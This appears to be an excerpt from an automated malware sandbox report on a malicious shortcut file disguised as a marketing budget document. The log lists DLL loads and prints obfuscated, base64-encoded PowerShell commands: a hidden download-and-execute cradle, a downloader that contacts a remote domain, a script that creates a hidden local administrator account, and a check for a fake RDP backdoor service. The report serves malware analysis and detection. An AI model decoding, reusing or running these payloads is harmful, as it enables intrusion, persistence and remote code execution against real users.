      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: samlib.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
      Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
      Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
      Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
      Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
      Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
      Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
      Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: apphelp.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: ncrypt.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: version.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: ntasn1.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: edgegdi.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: icu.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: ntmarta.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: cryptsp.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: rsaenh.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: cryptbase.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: winhttp.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: mswsock.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: wshunix.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: dnsapi.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: winrnr.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: nlaapi.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: wshbth.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: devobj.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: pnrpnsp.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: napinsp.dll
      Source: C:\Windows\Temp\myRdpService.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET lnk.lnkStatic file information: File size 14680064 > 1048576
      Source: Binary string: Automation.pdb-4437Rl,eB source: powershell.exe, 00000006.00000002.2977462889.0000022EFF5D6000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: Microsoft Unified Security Protocol Provider.pdbc source: powershell.exe, 0000000A.00000002.3740096561.000001EE6D0D0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: .pdb` source: powershell.exe, 0000000A.00000002.3732973453.000001EE6CDDC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: .pdbpdbtem.pdb source: powershell.exe, 0000000A.00000002.3739069923.000001EE6D07A000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: m.pdb0 source: powershell.exe, 0000000A.00000002.3740096561.000001EE6D125000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      barindex
      Found suspicious powershell code related to unpacking or dynamic code loading
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String("TkNpQWdJQ0FnSUNBZ0l5QkJjSEJzZVNCWVQxSWdaVzVqY25sd2RHbHZiaTlrWldOeWVYQjBhVzl1RFFvZ0lDQWdJQ0FnSUdadmNpQW9KR2tnUFNBd095QWthU0F0YkhRZ0pHWnBiR1ZDZVhSbGN5NU1aVzVuZEdnN0lDUnBLeXNwSUhzTkNpQW
      Obfuscated command line found
      Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /v /k "s^t^ar^t /MIn "" POwE^R^shELL -W h^I^D^D^E^n -nO^l^ogo -nO^p -Ep B^yp^a^s^S -ENCO^ded^Com^m^a^N^d "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBDAG8ARABpAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwB0AHIASQBOAEcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAFEAPQAiACkAKQApACkALgBDAG8AbgB0AGUAbgB0ACkAKQA="" && exit
      PowerShell case anomaly found
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwERshELL -W hIDDEn -nOlogo -nOp -Ep BypasS -ENCOdedCommaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBDAG8ARABpAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwB0AHIASQBOAEcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAFEAPQAiACkAKQApACkALgBDAG8AbgB0AGUAbgB0ACkAKQA="
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwERshELL -W hIDDEn -nOlogo -nOp -Ep BypasS -ENCOdedCommaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBDAG8ARABpAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwB0AHIASQBOAEcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAFEAPQAiACkAKQApACkALgBDAG8AbgB0AGUAbgB0ACkAKQA=" Jump to behavior
      Suspicious powershell command line found
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwERshELL -W hIDDEn -nOlogo -nOp -Ep BypasS -ENCOdedCommaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBDAG8ARABpAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwB0AHIASQBOAEcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAFEAPQAiACkAKQApACkALgBDAG8AbgB0AGUAbgB0ACkAKQA="
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8ANgA3AGYAMAA4ADIAOABkAGUANQA1AGEANwBiADAAYQBlADQAMQA0ADMAZABlAGYANAAxAGIAZQA1ADgAMgA2AGUAMwA1ADcAMgA4AGYAZQA1ADEANgBhADYAOABmAGQANwA3ADcANgBmADQAZgA0ADcANAA2ADgAOQBiAGMANgBhAGIAMgAyADIANwAzAGMANwAzAGIANwAwAGEAMQBkAGIANgBhADEAZAAxAGEANQBhADcAMgAyAGQAYgA1ADcAOAAyADYAYwBkAGIAYQBmADkAYgBiADEAZABhADkAMQA5AGEAYgA2AGIANQAzADkANgA3AGMANABiAGYAMAA0ADQAZgBiADgAMgBiADgAMQBhAGYAZABiAGYAMQA1ADUANgA5AGQANQBlAGMAYwBkAGUAMAAzAGIAYwA4AGMANABhADcAYQA3ADEANAA5ADgAZQBiADEAZAA2AGIAOAAwAGQAMgA2ADAAMAA3ADYANgBhAGEANwA5ADgAMQAxADkAZQA5ADcANAA0AGMAYwBiADkAYQAxADIANAA5ADcANgAxADgAZQA4AGMAMgAxADkAOAA3ADIANgAyADAAMwA2ACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
      Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwERshELL -W hIDDEn -nOlogo -nOp -Ep BypasS -ENCOdedCommaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBDAG8ARABpAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwB0AHIASQBOAEcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAFEAPQAiACkAKQApACkALgBDAG8AbgB0AGUAbgB0ACkAKQA=" Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand 